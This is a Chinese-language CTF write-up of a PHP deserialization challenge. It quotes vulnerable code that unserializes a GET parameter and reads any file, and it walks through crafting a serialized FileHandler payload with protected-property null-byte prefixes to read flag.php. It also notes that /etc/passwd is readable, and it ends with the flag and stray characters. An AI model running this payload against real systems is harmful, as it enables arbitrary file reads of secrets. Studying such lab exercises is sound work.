天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境
天命:本地php是复现不了反序列化漏洞的,都不知道是版本问题还是其他问题
天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了
进来题目先看到php代码审计,是反序列化漏洞
先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的
// 校验你是不是ascii码里面的合法字符
function is_valid($s) {for($i = 0; $i < strlen($s); $i++)if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))return false;return true;
}// 接受变量然后校验,进行反序列化激活类
if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str); // 反序列化}}接下来看一下生命周期函数和四大函数
看了一下只有读文件函数是有用的,那就要 $op=2 或者$op='2' 才行
// 生命周期函数:初始化函数function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}// 关键函数,当op等于2时候才进去正确的函数,读文件public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}// 这个函数是废的,我们要读取文件找flag,不是来写东西进文件private function write() {}// 文件包含漏洞的函数,能读取所有的文件,包括/etc/passwd都能读取private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}// 打印出来private function output($s) {echo "[Result]: <br>";echo $s;}$op 等于整数 2 即可,$filename等于 flag.php 即可,不需要 fuzz
比赛的现场题目是需要fuzz或者寻找一些配置文件来探索flag文件在哪里的
反正权限贼高,能读到 /etc/passwd
class FileHandler {public $op = 2;public $filename = "flag.php";public $content = "aaa";}$obj = new FileHandler();
echo serialize($obj);// 最后生成如下
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:3:"aaa";}需要改动一下
改动1:把小写s改成大写S
改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)
奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊
改好后最终答案如下
O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:3:"aaa";}flag{5f3275d0-e4ee-4faa-b72c-8c129a7c3400}
venv)
)
)
